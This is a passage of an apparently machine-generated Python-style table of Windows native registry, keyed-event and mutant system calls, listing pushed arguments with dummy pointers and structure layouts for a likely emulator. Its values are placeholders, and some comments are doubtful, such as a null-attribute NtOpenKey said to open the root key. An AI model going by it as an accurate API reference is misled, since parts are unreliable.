\"fieldComment\": \"None\"\r\n }\r\n ]\r\n }\r\n }\r\n },\r\n \"NtLoadKey2\": {\r\n \"ntFunc\": \"NtLoadKey2\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0x00000001\",\r\n \"additionalComment\": \"Flags (e.g., REG_NO_LAZY_FLUSH)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0040\",\r\n \"additionalComment\": \"Pointer to OBJECT_ATTRIBUTES HiveFileName (dummy pointer, typically non-None)\",\r\n \"structurePointer\": \"OBJECT_ATTRIBUTES\",\r\n \"structureRef\": \"struct189\",\r\n \"structureValueExpectations\": \"Length/size field; optional root directory handle; pointer to UNICODE_STRING object name; attribute flags; optional security descriptor pointer; optional security quality of service pointer.\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0050\",\r\n \"additionalComment\": \"Pointer to OBJECT_ATTRIBUTES DestinationKeyName (dummy pointer, typically non-None)\",\r\n \"structurePointer\": \"OBJECT_ATTRIBUTES\",\r\n \"structureRef\": \"struct190\",\r\n \"structureValueExpectations\": \"Length/size field; optional root directory handle; pointer to UNICODE_STRING object name; attribute flags; optional security descriptor pointer; optional security quality of service pointer.\",\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {\r\n \"struct189\": {\r\n \"type\": \"OBJECT_ATTRIBUTES\",\r\n \"fields\": [\r\n {\r\n \"fieldName\": \"Length\",\r\n \"fieldType\": \"ULONG\",\r\n \"fieldValue\": \"0x00000030\",\r\n \"fieldComment\": \"Size of OBJECT_ATTRIBUTES\"\r\n },\r\n {\r\n \"fieldName\": \"RootDirectory\",\r\n \"fieldType\": \"HANDLE\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"None\"\r\n },\r\n {\r\n \"fieldName\": \"ObjectName\",\r\n \"fieldType\": \"PUNICODE_STRING\",\r\n \"fieldValue\": \"0xbadd00c0\",\r\n \"fieldComment\": \"Pointer to UNICODE_STRING (dummy pointer)\"\r\n },\r\n {\r\n \"fieldName\": \"Attributes\",\r\n \"fieldType\": \"ULONG\",\r\n \"fieldValue\": \"0x00000040\",\r\n \"fieldComment\": \"OBJ_CASE_INSENSITIVE\"\r\n },\r\n {\r\n \"fieldName\": \"SecurityDescriptor\",\r\n \"fieldType\": \"PVOID\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"None\"\r\n },\r\n {\r\n \"fieldName\": \"SecurityQualityOfService\",\r\n \"fieldType\": \"PVOID\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"None\"\r\n }\r\n ]\r\n },\r\n \"struct190\": {\r\n \"type\": \"OBJECT_ATTRIBUTES\",\r\n \"fields\": [\r\n {\r\n \"fieldName\": \"Length\",\r\n \"fieldType\": \"ULONG\",\r\n \"fieldValue\": \"0x00000030\",\r\n \"fieldComment\": \"Size of OBJECT_ATTRIBUTES\"\r\n },\r\n {\r\n \"fieldName\": \"RootDirectory\",\r\n \"fieldType\": \"HANDLE\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"None\"\r\n },\r\n {\r\n \"fieldName\": \"ObjectName\",\r\n \"fieldType\": \"PUNICODE_STRING\",\r\n \"fieldValue\": \"0xbadd00d0\",\r\n \"fieldComment\": \"Pointer to UNICODE_STRING (dummy pointer)\"\r\n },\r\n {\r\n \"fieldName\": \"Attributes\",\r\n \"fieldType\": \"ULONG\",\r\n \"fieldValue\": \"0x00000040\",\r\n \"fieldComment\": \"OBJ_CASE_INSENSITIVE\"\r\n },\r\n {\r\n \"fieldName\": \"SecurityDescriptor\",\r\n \"fieldType\": \"PVOID\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"None\"\r\n },\r\n {\r\n \"fieldName\": \"SecurityQualityOfService\",\r\n \"fieldType\": \"PVOID\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"None\"\r\n }\r\n ]\r\n }\r\n }\r\n },\r\n \"NtNotifyChangeKey\": {\r\n \"ntFunc\": \"NtNotifyChangeKey\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0x00000001\",\r\n \"additionalComment\": \"BOOLEAN Asynchronous (TRUE)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000100\",\r\n \"additionalComment\": \"ULONG RegChangesDataBufferLength (256 bytes)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0060\",\r\n \"additionalComment\": \"Pointer to RegChangesDataBuffer (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0xbadd0200\"\r\n },\r\n {\r\n \"value\": \"0x00000001\",\r\n \"additionalComment\": \"BOOLEAN WatchSubtree (TRUE)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000010\",\r\n \"additionalComment\": \"ULONG NotifyFilter (REG_NOTIFY_CHANGE_LAST_SET)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0070\",\r\n \"additionalComment\": \"Pointer to IO_STATUS_BLOCK (dummy pointer)\",\r\n \"structurePointer\": \"IO_STATUS_BLOCK\",\r\n \"structureRef\": \"struct191\",\r\n \"structureValueExpectations\": \"Status and Information fields for I/O completion.\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0080\",\r\n \"additionalComment\": \"Pointer to ApcRoutineContext (dummy pointer, optional user context)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0xdeadbeef\"\r\n },\r\n {\r\n \"value\": \"0xbadd0090\",\r\n \"additionalComment\": \"Pointer to IO_APC_ROUTINE (dummy pointer, optional callback)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0xbadd0300\"\r\n },\r\n {\r\n \"value\": \"0x0000beef\",\r\n \"additionalComment\": \"HANDLE EventHandle (dummy handle, optional event)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x0000abcd\",\r\n \"additionalComment\": \"HANDLE KeyHandle (dummy handle)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {\r\n \"struct191\": {\r\n \"type\": \"IO_STATUS_BLOCK\",\r\n \"fields\": [\r\n {\r\n \"fieldName\": \"Status\",\r\n \"fieldType\": \"NTSTATUS\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"STATUS_SUCCESS (initial value)\"\r\n },\r\n {\r\n \"fieldName\": \"Information\",\r\n \"fieldType\": \"ULONG_PTR\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"No information yet\"\r\n }\r\n ]\r\n }\r\n }\r\n },\r\n \"NtOpenKey\": {\r\n \"ntFunc\": \"NtOpenKey\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"None (no OBJECT_ATTRIBUTES, open root key)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00020019\",\r\n \"additionalComment\": \"KEY_READ | KEY_QUERY_VALUE | KEY_ENUMERATE_SUB_KEYS\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0000\",\r\n \"additionalComment\": \"Pointer to HANDLE KeyHandle (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000000\"\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtQueryKey\": {\r\n \"ntFunc\": \"NtQueryKey\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0xbadd0010\",\r\n \"additionalComment\": \"Pointer to ULONG ResultLength (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000040\"\r\n },\r\n {\r\n \"value\": \"0x00000100\",\r\n \"additionalComment\": \"Length of buffer (256 bytes)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0020\",\r\n \"additionalComment\": \"Pointer to buffer for KeyInformation (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000002\",\r\n \"additionalComment\": \"KeyInformationClass = KeyNodeInformation\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00004444\",\r\n \"additionalComment\": \"HANDLE KeyHandle (dummy handle)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtQueryMultipleValueKey\": {\r\n \"ntFunc\": \"NtQueryMultipleValueKey\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0xbadd0030\",\r\n \"additionalComment\": \"Pointer to ULONG RequiredLength (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000200\"\r\n },\r\n {\r\n \"value\": \"0x00000200\",\r\n \"additionalComment\": \"BufferLength (512 bytes)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0040\",\r\n \"additionalComment\": \"Pointer to DataBuffer (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000002\",\r\n \"additionalComment\": \"NumberOfValues = 2\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0050\",\r\n \"additionalComment\": \"Pointer to KEY_MULTIPLE_VALUE_INFORMATION array (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00004444\",\r\n \"additionalComment\": \"HANDLE KeyHandle (dummy handle)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtQueryValueKey\": {\r\n \"ntFunc\": \"NtQueryValueKey\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0xbadd0060\",\r\n \"additionalComment\": \"Pointer to ULONG ResultLength (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000020\"\r\n },\r\n {\r\n \"value\": \"0x00000040\",\r\n \"additionalComment\": \"Length (64 bytes)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0070\",\r\n \"additionalComment\": \"Pointer to KeyValueInformation buffer (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000001\",\r\n \"additionalComment\": \"KeyValueInformationClass = KeyValueFullInformation\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"None ValueName (query default value)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00004444\",\r\n \"additionalComment\": \"HANDLE KeyHandle (dummy handle)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtReplaceKey\": {\r\n \"ntFunc\": \"NtReplaceKey\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"None BackupHiveFileName (no backup)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00004444\",\r\n \"additionalComment\": \"HANDLE KeyHandle (dummy handle)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"None NewHiveFileName (no new hive file)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtRestoreKey\": {\r\n \"ntFunc\": \"NtRestoreKey\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"RestoreOption (default: 0, e.g. no special options)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x0000abcd\",\r\n \"additionalComment\": \"HANDLE FileHandle (dummy handle to registry hive file)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x0000beef\",\r\n \"additionalComment\": \"HANDLE KeyHandle (dummy handle to registry key)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtSaveKey\": {\r\n \"ntFunc\": \"NtSaveKey\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0x0000abcd\",\r\n \"additionalComment\": \"HANDLE FileHandle (dummy handle to registry hive file)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x0000beef\",\r\n \"additionalComment\": \"HANDLE KeyHandle (dummy handle to registry key)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtSetInformationKey\": {\r\n \"ntFunc\": \"NtSetInformationKey\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0x00000010\",\r\n \"additionalComment\": \"ULONG DataLength (example: 16 bytes of data)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0000\",\r\n \"additionalComment\": \"PVOID KeyInformationData (dummy pointer to data buffer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0xdeadbeef\"\r\n },\r\n {\r\n \"value\": \"0x00000001\",\r\n \"additionalComment\": \"KEY_SET_INFORMATION_CLASS InformationClass (KeyWriteTimeInformation)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x0000beef\",\r\n \"additionalComment\": \"HANDLE KeyHandle (dummy handle to registry key)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtSetValueKey\": {\r\n \"ntFunc\": \"NtSetValueKey\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0x00000004\",\r\n \"additionalComment\": \"ULONG DataSize (example: 4 bytes of data)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0010\",\r\n \"additionalComment\": \"PVOID Data (dummy pointer to data buffer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x12345678\"\r\n },\r\n {\r\n \"value\": \"0x00000001\",\r\n \"additionalComment\": \"ULONG Type (REG_SZ)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"ULONG TitleIndex (usually 0, reserved)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0020\",\r\n \"additionalComment\": \"PUNICODE_STRING ValueName (dummy pointer to UNICODE_STRING)\",\r\n \"structurePointer\": \"UNICODE_STRING\",\r\n \"structureRef\": \"struct192\",\r\n \"structureValueExpectations\": \"Length, MaximumLength, Buffer pointer to value name string.\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x0000beef\",\r\n \"additionalComment\": \"HANDLE KeyHandle (dummy handle to registry key)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {\r\n \"struct192\": {\r\n \"type\": \"UNICODE_STRING\",\r\n \"fields\": [\r\n {\r\n \"fieldName\": \"Length\",\r\n \"fieldType\": \"USHORT\",\r\n \"fieldValue\": \"0x0010\",\r\n \"fieldComment\": \"Length in bytes of the string (8 UTF-16 chars)\"\r\n },\r\n {\r\n \"fieldName\": \"MaximumLength\",\r\n \"fieldType\": \"USHORT\",\r\n \"fieldValue\": \"0x0020\",\r\n \"fieldComment\": \"Maximum buffer size in bytes\"\r\n },\r\n {\r\n \"fieldName\": \"Buffer\",\r\n \"fieldType\": \"PWSTR\",\r\n \"fieldValue\": \"0xbadd0040\",\r\n \"fieldComment\": \"Dummy pointer to value name string buffer\"\r\n }\r\n ]\r\n }\r\n }\r\n },\r\n \"NtUnloadKey\": {\r\n \"ntFunc\": \"NtUnloadKey\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0xbadd0030\",\r\n \"additionalComment\": \"POBJECT_ATTRIBUTES DestinationKeyName (dummy pointer to OBJECT_ATTRIBUTES)\",\r\n \"structurePointer\": \"OBJECT_ATTRIBUTES\",\r\n \"structureRef\": \"struct193\",\r\n \"structureValueExpectations\": \"Length/size field; optional root directory handle; optional UNICODE_STRING object name pointer; attribute flags; optional security descriptor pointer; optional security quality of service pointer.\",\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {\r\n \"struct193\": {\r\n \"type\": \"OBJECT_ATTRIBUTES\",\r\n \"fields\": [\r\n {\r\n \"fieldName\": \"Length\",\r\n \"fieldType\": \"ULONG\",\r\n \"fieldValue\": \"0x00000030\",\r\n \"fieldComment\": \"Size of OBJECT_ATTRIBUTES\"\r\n },\r\n {\r\n \"fieldName\": \"RootDirectory\",\r\n \"fieldType\": \"HANDLE\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"None\"\r\n },\r\n {\r\n \"fieldName\": \"ObjectName\",\r\n \"fieldType\": \"PUNICODE_STRING\",\r\n \"fieldValue\": \"0xbadd0050\",\r\n \"fieldComment\": \"Pointer to UNICODE_STRING (dummy pointer)\"\r\n },\r\n {\r\n \"fieldName\": \"Attributes\",\r\n \"fieldType\": \"ULONG\",\r\n \"fieldValue\": \"0x00000040\",\r\n \"fieldComment\": \"OBJ_CASE_INSENSITIVE\"\r\n },\r\n {\r\n \"fieldName\": \"SecurityDescriptor\",\r\n \"fieldType\": \"PVOID\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"None\"\r\n },\r\n {\r\n \"fieldName\": \"SecurityQualityOfService\",\r\n \"fieldType\": \"PVOID\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"None\"\r\n }\r\n ]\r\n }\r\n }\r\n },\r\n \"RtlFormatCurrentUserKeyPath\": {\r\n \"ntFunc\": \"RtlFormatCurrentUserKeyPath\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"PUNICODE_STRING RegistryPath (None, output parameter)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtCreateKeyedEvent\": {\r\n \"ntFunc\": \"NtCreateKeyedEvent\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"ULONG Reserved (must be zero)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"POBJECT_ATTRIBUTES ObjectAttributes (None, unnamed event)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x001F0003\",\r\n \"additionalComment\": \"ACCESS_MASK DesiredAccess (EVENT_ALL_ACCESS)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0000\",\r\n \"additionalComment\": \"PHANDLE KeyedEventHandle (dummy pointer, output parameter)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000444\"\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtReleaseKeyedEvent\": {\r\n \"ntFunc\": \"NtReleaseKeyedEvent\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"PLARGE_INTEGER Timeout (None, wait forever)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"BOOLEAN Alertable (FALSE)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"PVOID Key (None, no key specified)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000444\",\r\n \"additionalComment\": \"HANDLE KeyedEventHandle (dummy handle)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtWaitForKeyedEvent\": {\r\n \"ntFunc\": \"NtWaitForKeyedEvent\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"PLARGE_INTEGER Timeout (None, wait forever)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"BOOLEAN Alertable (FALSE)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"PVOID Key (None, no key specified)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000444\",\r\n \"additionalComment\": \"HANDLE KeyedEventHandle (dummy handle)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtCreateMutant\": {\r\n \"ntFunc\": \"NtCreateMutant\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"BOOLEAN InitialOwner (FALSE, caller does not own mutant initially)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"POBJECT_ATTRIBUTES ObjectAttributes (None, unnamed mutant)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x001F0001\",\r\n \"additionalComment\": \"ACCESS_MASK DesiredAccess (MUTANT_ALL_ACCESS)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0010\",\r\n \"additionalComment\": \"PHANDLE MutantHandle (dummy pointer, output parameter)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000445\"\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtOpenMutant\": {\r\n \"ntFunc\": \"NtOpenMutant\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"None (no OBJECT_ATTRIBUTES specified)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x001F0001\",\r\n \"additionalComment\": \"DesiredAccess (MUTANT_ALL_ACCESS)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0000\",\r\n \"additionalComment\": \"Pointer to HANDLE MutantHandle (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000000\"\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtQueryMutant\": {\r\n \"ntFunc\": \"NtQueryMutant\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0xbadd0010\",\r\n \"additionalComment\": \"Pointer to ULONG ResultLength (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000010\"\r\n },\r\n {\r\n \"value\": \"0x00000010\",\r\n \"additionalComment\": \"MutantInformationLength (size of MUTANT_BASIC_INFORMATION)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0020\",\r\n \"additionalComment\": \"Pointer to MUTANT_BASIC_INFORMATION (dummy pointer)\",\r\n \"structurePointer\": \"MUTANT_BASIC_INFORMATION\",\r\n \"structureRef\": \"struct194\",\r\n \"structureValueExpectations\": \"Holds state and count information about the mutant.\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"MutantInformationClass (MutantBasicInformation)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000444\",\r\n \"additionalComment\": \"HANDLE MutantHandle (dummy handle)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {\r\n \"struct194\": {\r\n \"type\": \"MUTANT_BASIC_INFORMATION\",\r\n \"fields\": [\r\n {\r\n \"fieldName\": \"CurrentCount\",\r\n \"fieldType\": \"LONG\",\r\n \"fieldValue\": \"0x00000001\",\r\n \"fieldComment\": \"Mutant is signaled (count = 1)\"\r\n },\r\n {\r\n \"fieldName\": \"OwnedByCaller\",\r\n \"fieldType\": \"BOOLEAN\",\r\n \"fieldValue\": \"0x01\",\r\n \"fieldComment\": \"TRUE (owned by caller)\"\r\n },\r\n {\r\n \"fieldName\": 